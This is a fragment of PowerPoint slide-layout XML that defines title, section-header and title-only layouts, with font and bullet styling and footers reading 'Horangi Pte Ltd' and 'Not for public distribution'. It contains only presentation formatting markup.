        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 237"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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6000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt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8_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 239"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2057400"/>
            <a:ext cx="9144000" cy="30861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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="60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41" name="Shape 241"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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4_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 242"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EEDDCE"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 244"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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5_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 246"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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50" name="Shape 250"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2416200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>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Section Header">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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53" name="Shape 253"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2416200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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Shape 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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Section Header">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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56" name="Shape 256"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2416200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="14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Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 257"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>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60" name="Shape 260"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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1" name="Shape 261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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Only">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 263"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>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66" name="Shape 266"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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267" name="Shape 267"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
